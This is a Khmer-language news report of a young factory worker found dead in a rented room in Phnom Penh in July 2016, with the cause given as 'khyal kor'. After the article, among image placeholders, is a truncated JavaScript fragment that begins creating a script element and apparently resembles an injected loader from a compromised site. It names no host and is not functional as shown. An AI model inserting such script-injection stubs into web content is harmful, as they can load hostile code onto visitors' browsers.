យុវជនម្នាក់ដេកស្លាប់ដោយសារខ្យល់គ នៅក្នុងបន្ទប់ផ្ទះជួល

ភ្នំពេញ៖ នៅថ្ងៃទី០៤ ខែកក្កដា ឆ្នាំ២០១៦ នៅវេលាម៉ោង០៦:៣០នាទី ស្ថិតនៅក្នុងបន្ទប់ជួលក្នុងក្រុម៥ ភូមិដំណាក់ធំ សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ រាជធានីភ្នំពេញ ។

យុវជនម្នាក់ដេកស្លាប់ដោយសារខ្យល់គមានឈ្មោះ ដាំ ឌីណា ភេទប្រុស អាយុ២៣ឆ្នាំ មានស្រុកកំណើតបៅភូមិព្រឹកធំ ឃុំអ្នកលឿង ស្រុកពាមរក៍ ខេត្តព្រៃវែង មានមុខរបរជាកម្មកររោងចក្រ ខេមបូស៊ីន ហ្វេងជីង ហ្គាមេន,.ខូអិលធីឌី ។

បើតាមការបកស្រាយបំភ្លឺពីអ្នកជិតខាងនិងមិត្តភ័ក្ត្របានអោយដឹងថានៅវេលាម៉ោង០៦:៣០នាទីពួកគាត់បានចេញពីបន្ទប់បំរុងទៅធ្វើការដូចសព្វដង តែមិន ឃើញសពឈ្មោះ ដាំ ឌីណា មកឈរចាំដូចសព្វដង សោះ ពួកគាត់ខំតេក៏តេមិនចូល ទើបពួកគាត់នាំគ្នា គាស់បង្អូចយកដងអំបោះស្កិះ ក៏មិនកំរើក ទើប ពួកគាត់ធ្វើការទំលុះទ្វារទើបបានដឹងថាសពឈ្មោះដាំ ឌីណាបានដេកស្លាប់មិនដឹងតាំងពីណានោះទេ ។ ក្រោយពីធ្វើកោសល្យវិច្ឆ័យរួចមកទើបដឹងថាសពឈ្នោះដាំ ឌីណា ដេកស្លាប់ដោយខ្យល់គប្រហែល ម៉ោ០៣:៣០នាទីព្រឹកឈានចូលថ្ងៃទី០៤ខែកក្កដាឆ្នាំ២០១៦។

សពត្រូវបានប្រគល់ជូនដល់គ្រួសារយកទៅធ្វើបុណ្យនៅឯស្រុកកំណើតតាមប្រពៃណី។

image image image imagevar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More